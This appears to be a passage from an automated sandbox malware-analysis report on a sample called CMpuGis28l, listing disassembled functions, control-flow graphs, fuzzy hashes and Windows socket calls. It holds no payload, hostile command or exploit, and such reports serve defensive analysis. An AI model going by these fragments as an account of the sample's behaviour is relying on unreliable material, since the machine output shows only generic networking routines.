                                                        • Instruction Fuzzy Hash: F7113AB1969344BFD3207A659C56E273B5CEBC2B6CF45590EBC082B341D265AC01D6F3
                                                        Function 012FD1B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1534 12fd1b0-12fd261 call 12f8d18 1537 12fd397-12fd3a1 1534->1537 1538 12fd267-12fd26e 1534->1538 1539 12fd2ba-12fd2bd 1538->1539 1540 12fd2bf-12fd2e5 1539->1540 1541 12fd270-12fd281 1539->1541 1544 12fd2eb-12fd304 1540->1544 1545 12fd390 1540->1545 1542 12fd28c-12fd296 1541->1542 1543 12fd283-12fd28a 1541->1543 1547 12fd29c 1542->1547 1548 12fd320-12fd327 call 12f8c68 1542->1548 1543->1542 1546 12fd29f-12fd2a2 1543->1546 1549 12fd306-12fd312 1544->1549 1545->1537 1550 12fd2a9-12fd2b4 1546->1550 1547->1546 1554 12fd32c 1548->1554 1551 12fd338-12fd33d 1549->1551 1552 12fd314-12fd317 1549->1552 1550->1539 1550->1545 1555 12fdacb-12fdae0 call 12fb620 1551->1555 1556 12fd343-12fd346 1551->1556 1552->1548 1552->1551 1557 12fd58d-12fd58f 1552->1557 1558 12fd48b-12fd48d 1552->1558 1559 12fd5ab-12fd5ad 1552->1559 1560 12fd5c9-12fd5cc 1552->1560 1561 12fd4a6-12fd4a8 1552->1561 1562 12fd686-12fd68f 1552->1562 1563 12fd4c4-12fd4d7 call 12fb620 1552->1563 1564 12fd5e2-12fd5e4 1552->1564 1565 12fd600-12fd60a 1552->1565 1566 12fd6e0-12fd715 call 12fb680 1552->1566 1567 12fd4dc-12fd4de 1552->1567 1568 12fd6b3-12fd6bc 1552->1568 1569 12fd550-12fd556 1552->1569 1554->1546 1555->1550 1556->1555 1581 12fd34c-12fd34e 1556->1581 1574 12fd380-12fd384 1557->1574 1578 12fd595-12fd5a6 1557->1578 1558->1574 1587 12fd493-12fd4a1 1558->1587 1559->1574 1579 12fd5b3-12fd5c4 1559->1579 1577 12fd5d2-12fd5dd 1560->1577 1580 12fdb9c-12fdbbd 1560->1580 1561->1574 1588 12fd4ae-12fd4bf 1561->1588 1589 12fda2c-12fda45 call 12fc9a0 1562->1589 1590 12fd695-12fd6ae call 12fc9a0 1562->1590 1563->1550 1582 12fd5ea-12fd5fb 1564->1582 1583 12fdab1-12fdab4 1564->1583 1584 12fd8b2-12fd8c7 1565->1584 1585 12fd610-12fd623 1565->1585 1566->1550 1573 12fd4e4-12fd52f localeconv call 1307890 1567->1573 1567->1574 1571 12fd9be-12fd9ce call 12fca30 1568->1571 1572 12fd6c2-12fd6db call 12fca30 1568->1572 1576 12fd558-12fd55e 1569->1576 1569->1577 1617 12fd9d3-12fd9d7 1571->1617 1572->1550 1623 12fd53e-12fd54b 1573->1623 1624 12fd531-12fd536 1573->1624 1591 12fd386-12fd388 1574->1591 1599 12fdae5-12fdaf8 1576->1599 1600 12fd564-12fd572 1576->1600 1577->1591 1578->1591 1579->1591 1580->1591 1602 12fdabb-12fdac6 1581->1602 1603 12fd354-12fd35f 1581->1603 1582->1591 1583->1555 1607 12fdab6 1583->1607 1597 12fd8cd-12fd8dd 1584->1597 1598 12fdb80-12fdb82 1584->1598 1605 12fdb7c-12fdb7e 1585->1605 1606 12fd629-12fd637 1585->1606 1587->1591 1588->1591 1589->1550 1590->1550 1591->1549 1622 12fd38e 1591->1622 1613 12fd8df-12fd8e2 1597->1613 1614 12fd8e9-12fd8f8 1597->1614 1612 12fdb84-12fdb97 call 12fb9b0 1598->1612 1599->1591 1615 12fdcb8-12fdcba 1600->1615 1616 12fd578-12fd588 1600->1616 1603->1574 1618 12fd361-12fd369 1603->1618 1605->1612 1620 12fd639-12fd63c 1606->1620 1621 12fd643-12fd650 1606->1621 1607->1602 1613->1614 1626 12fd8fe-12fd90f 1614->1626 1627 12fdc7a-12fdc94 call 12fb9b0 1614->1627 1628 12fdcbc-12fdcc7 1615->1628 1629 12fdcd3-12fdcf3 1615->1629 1616->1591 1617->1550 1630 12fd36f-12fd37c 1618->1630 1631 12fdb6c-12fdb77 1618->1631 1620->1621 1632 12fdc99-12fdcb3 call 12fb9b0 1621->1632 1633 12fd656-12fd667 1621->1633 1622->1545 1623->1591 1624->1623 1635 12fd915-12fd91a 1626->1635 1636 12fdc61-12fdc6a 1626->1636 1627->1632 1628->1629 1629->1591 1630->1574 1631->1591 1632->1617 1639 12fdafd-12fdb06 1633->1639 1640 12fd66d-12fd681 call 12fcc70 1633->1640 1641 12fdb3c-12fdb3f 1635->1641 1642 12fd920-12fd95a call 12fcc70 1635->1642 1636->1627 1639->1641 1640->1617 1641->1636 1646 12fdb45 1641->1646 1642->1617 1646->1631
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$Inf$NaN
                                                        • API String ID: 0-141429178
                                                        • Opcode ID: 62135a2553316bed519f0bbc54b1e03a48642683407f16f137a949377bd930f1
                                                        • Instruction ID: b5a9495c13ebd7d0b0f8c8f88310bd7b283b28c95dcce2e7ca7b2c779275d5f1
                                                        • Opcode Fuzzy Hash: 62135a2553316bed519f0bbc54b1e03a48642683407f16f137a949377bd930f1
                                                        • Instruction Fuzzy Hash: 12F1C07162C39A8BD7218F68C0507ABFBE1BB85314F148A3DDBDD87381D77599058B82
                                                        Function 00F77770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1750 f77770-f7778e 1751 f777b6-f777c2 recv 1750->1751 1752 f77790-f77797 1750->1752 1754 f777c4-f777d9 call f772a0 1751->1754 1755 f7782e-f77832 1751->1755 1752->1751 1753 f77799-f777a1 1752->1753 1757 f777a3-f777b4 1753->1757 1758 f777db-f77829 call f772a0 call f7cb20 call 12f8c50 1753->1758 1754->1755 1757->1754 1758->1755
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: recv
                                                        • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                        • API String ID: 1507349165-640788491
                                                        • Opcode ID: 4663536b931c47bb7cb12badac4a2a315f10719633b40806686d67604c73e6b6
                                                        • Instruction ID: b00515227c5c19abffba0b7d29e93652f52d16abe6c27ee0f87cf2b40cb62f85
                                                        • Opcode Fuzzy Hash: 4663536b931c47bb7cb12badac4a2a315f10719633b40806686d67604c73e6b6
                                                        • Instruction Fuzzy Hash: 0B117AB5918304BBD320BA519C5AE277B9CEB86B6CF45951EBC0C27341D261AC01D6F3
                                                        Function 00F775E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1769 f775e0-f775ed 1770 f77607-f77629 socket 1769->1770 1771 f775ef-f775f6 1769->1771 1772 f7763f-f77642 1770->1772 1773 f7762b-f7763c call f772a0 1770->1773 1771->1770 1774 f775f8-f775ff 1771->1774 1773->1772 1775 f77643-f77699 call f772a0 call f7cb20 call 12f8c50 1774->1775 1776 f77601-f77602 1774->1776 1776->1770
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: socket
                                                        • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                        • API String ID: 98920635-842387772
                                                        • Opcode ID: 95c6ff8a1c24b2718b44b957f9b3755ca957aae65b5f94f8ef81698ab53ed886
                                                        • Instruction ID: ccc5f4645d8a8c5feb2fef2f10761a5b79ac9569828a4616d06d7979b3ffafd3
                                                        • Opcode Fuzzy Hash: 95c6ff8a1c24b2718b44b957f9b3755ca957aae65b5f94f8ef81698ab53ed886
                                                        • Instruction Fuzzy Hash: 8411EF71A5030177CB202A396C16F9B3B84EF81778F41581AFC189A282D221C860D7D2
                                                        Function 00FAA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1878 faa150-faa159 1879 faa15f-faa17b 1878->1879 1880 faa250 1878->1880 1881 faa249-faa24f 1879->1881 1882 faa181-faa1ce getsockname 1879->1882 1881->1880 1883 faa1d0-faa1f5 call f8d090 1882->1883 1884 faa1f7-faa214 call faef30 1882->1884 1891 faa240-faa246 call fb4f40 1883->1891 1884->1881 1889 faa216-faa23b call f8d090 1884->1889 1889->1891 1891->1881
                                                        APIs
                                                        • getsockname.WS2_32(?,?,00000080), ref: 00FAA1C7
                                                        Strings
                                                        • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00FAA23B
                                                        • getsockname() failed with errno %d: %s, xrefs: 00FAA1F0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: getsockname
                                                        • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                        • API String ID: 3358416759-2605427207
                                                        • Opcode ID: 357ec18704a2d56ecda9453b2daeacb75bf03132a4bba2036765bf0cb11e7bbe
                                                        • Instruction ID: 55973e3a4a3063761903c4df4f2ad4848fb5476c6b36de69259e50dcdacecd7b
                                                        • Opcode Fuzzy Hash: 357ec18704a2d56ecda9453b2daeacb75bf03132a4bba2036765bf0cb11e7bbe
                                                        • Instruction Fuzzy Hash: AB21DB71C48680BAF7219B19DC46FE673ACEF91338F044614F99853151FB32699987E2
                                                        Function 00F8D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1898 f8d5e0-f8d5ee 1899 f8d5f0-f8d604 call f8d690 1898->1899 1900 f8d652-f8d662 WSAStartup 1898->1900 1906 f8d61b-f8d651 call f97620 1899->1906 1907 f8d606-f8d614 1899->1907 1902 f8d670-f8d676 1900->1902 1903 f8d664-f8d66f 1900->1903 1902->1899 1904 f8d67c-f8d68d 1902->1904 1907->1906 1912 f8d616 1907->1912 1912->1906
                                                        APIs
                                                        • WSAStartup.WS2_32(00000202), ref: 00F8D65A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: Startup
                                                        • String ID: if_nametoindex$iphlpapi.dll
                                                        • API String ID: 724789610-3097795196
                                                        • Opcode ID: 6be46400255d39a613ec05615403eee1bcecfd415236b9746f627a273b26794e
                                                        • Instruction ID: df5dc4f26227a485bd17b26c58a6a9044574ab38842dedad91cf2a2ff34a0100
                                                        • Opcode Fuzzy Hash: 6be46400255d39a613ec05615403eee1bcecfd415236b9746f627a273b26794e
                                                        • Instruction Fuzzy Hash: 75019ED0D8038542FB207F389C2B3A636A86F11344F89182CDC48961C3F76CC999D393
                                                        Function 0103AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1914 103aa30-103aa64 1916 103ab04-103ab09 1914->1916 1917 103aa6a-103aaa7 call 102e730 1914->1917 1918 103ae80-103ae89 1916->1918 1921 103aaa9-103aabd 1917->1921 1922 103ab0e-103ab13 1917->1922 1924 103ab18-103ab50 1921->1924 1925 103aabf-103aac7 1921->1925 1923 103ae2e 1922->1923 1926 103ae30-103ae4a call 102ea60 call 102ebf0 1923->1926 1930 103ab58-103ab6d 1924->1930 1925->1923 1927 103aacd-103ab02 1925->1927 1939 103ae75-103ae7d 1926->1939 1940 103ae4c-103ae57 1926->1940 1927->1930 1933 103ab96-103abab socket 1930->1933 1934 103ab6f-103ab73 1930->1934 1933->1923 1938 103abb1-103abc5 1933->1938 1934->1933 1936 103ab75-103ab8f 1934->1936 1936->1938 1952 103ab91 1936->1952 1941 103abd0-103abed ioctlsocket 1938->1941 1942 103abc7-103abca 1938->1942 1939->1918 1944 103ae59-103ae5e 1940->1944 1945 103ae6e-103ae74 1940->1945 1947 103ac10-103ac14 1941->1947 1948 103abef-103ac0a 1941->1948 1942->1941 1946 103ad2e-103ad39 1942->1946 1944->1945 1955 103ae60-103ae6c 1944->1955 1945->1939 1953 103ad52-103ad56 1946->1953 1954 103ad3b-103ad4c 1946->1954 1949 103ac37-103ac41 1947->1949 1950 103ac16-103ac31 1947->1950 1948->1947 1960 103ae29 1948->1960 1958 103ac43-103ac46 1949->1958 1959 103ac7a-103ac7e 1949->1959 1950->1949 1950->1960 1952->1923 1953->1960 1961 103ad5c-103ad6b 1953->1961 1954->1953 1954->1960 1955->1939 1963 103ad04-103ad08 1958->1963 1964 103ac4c-103ac51 1958->1964 1965 103ac80-103ac9b 1959->1965 1966 103ace7-103ad03 1959->1966 1960->1923 1968 103ad70-103ad78 1961->1968 1963->1946 1972 103ad0a-103ad28 1963->1972 1964->1963 1973 103ac57-103ac78 1964->1973 1965->1966 1974 103ac9d-103acc1 1965->1974 1966->1963 1970 103ada0-103adae connect 1968->1970 1971 103ad7a-103ad7f 1968->1971 1977 103adb3-103adcf 1970->1977 1971->1970 1975 103ad81-103ad99 1971->1975 1972->1946 1972->1960 1978 103acc6-103acd7 1973->1978 1974->1978 1975->1977 1985 103add5-103add8 1977->1985 1986 103ae8a-103ae91 1977->1986 1978->1960 1984 103acdd-103ace5 1978->1984 1984->1963 1984->1966 1987 103ade1-103adf1 1985->1987 1988 103adda-103addf 1985->1988 1986->1926 1989 103adf3-103ae07 1987->1989 1990 103ae0d-103ae12 1987->1990 1988->1968 1988->1987 1989->1990 1996 103aea8-103aead 1989->1996 1991 103ae14-103ae17 1990->1991 1992 103ae1a-103ae1c call 103af70 1990->1992 1991->1992 1995 103ae21-103ae23 1992->1995 1997 103ae93-103ae9d 1995->1997 1998 103ae25-103ae27 1995->1998 1996->1926 1999 103aeaf-103aeb1 call 102e760 1997->1999 2000 103ae9f-103aea6 call 102e7c0 1997->2000 1998->1926 2004 103aeb6-103aebe 1999->2004 2000->2004 2005 103aec0-103aedb call 102e180 2004->2005 2006 103af1a-103af1f 2004->2006 2005->1926 2009 103aee1-103aeec 2005->2009 2006->1926 2010 103af02-103af06 2009->2010 2011 103aeee-103aeff 2009->2011 2012 103af08-103af0b 2010->2012 2013 103af0e-103af15 2010->2013 2011->2010 2012->2013 2013->1918
                                                        APIs
                                                        • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0103AB9A
                                                        • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0103ABE4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: ioctlsocketsocket
                                                        • String ID:
                                                        • API String ID: 416004797-0
                                                        • Opcode ID: 278c3af8484f743dc248139b4941e2f9a01c8cd3f667f2c4f1fa449267b615fd
                                                        • Instruction ID: aa0b393d8b8ed1410f7822b200f990d632b580611c5410da0ef3bd59a1986029
                                                        • Opcode Fuzzy Hash: 278c3af8484f743dc248139b4941e2f9a01c8cd3f667f2c4f1fa449267b615fd
                                                        • Instruction Fuzzy Hash: 84E1A170604302DBEB20CF28C884B6B7BE9EF89314F044A6DEAD9DB291D775D944CB52
                                                        Function 00F778B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: closesocket
                                                        • String ID: FD %s:%d sclose(%d)
                                                        • API String ID: 2781271927-3116021458
                                                        • Opcode ID: 2f1c9da16d549f3e2e1fdf4cac6a19035e5cc36702ccb47b045fbda05a1452d2
                                                        • Instruction ID: d39d21ba57c17dfe137aa08d76afe93c72cef1b1821c780e14015a698354f053
                                                        • Opcode Fuzzy Hash: 2f1c9da16d549f3e2e1fdf4cac6a19035e5cc36702ccb47b045fbda05a1452d2
                                                        • Instruction Fuzzy Hash: B8D05E32919321AB8630655AAC49C4B7AA8DEC6F60B0A486AFD586B205D1209C0497E3
                                                        Function 0103B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0103B29E,?,00000000,?,?), ref: 0103B0B9
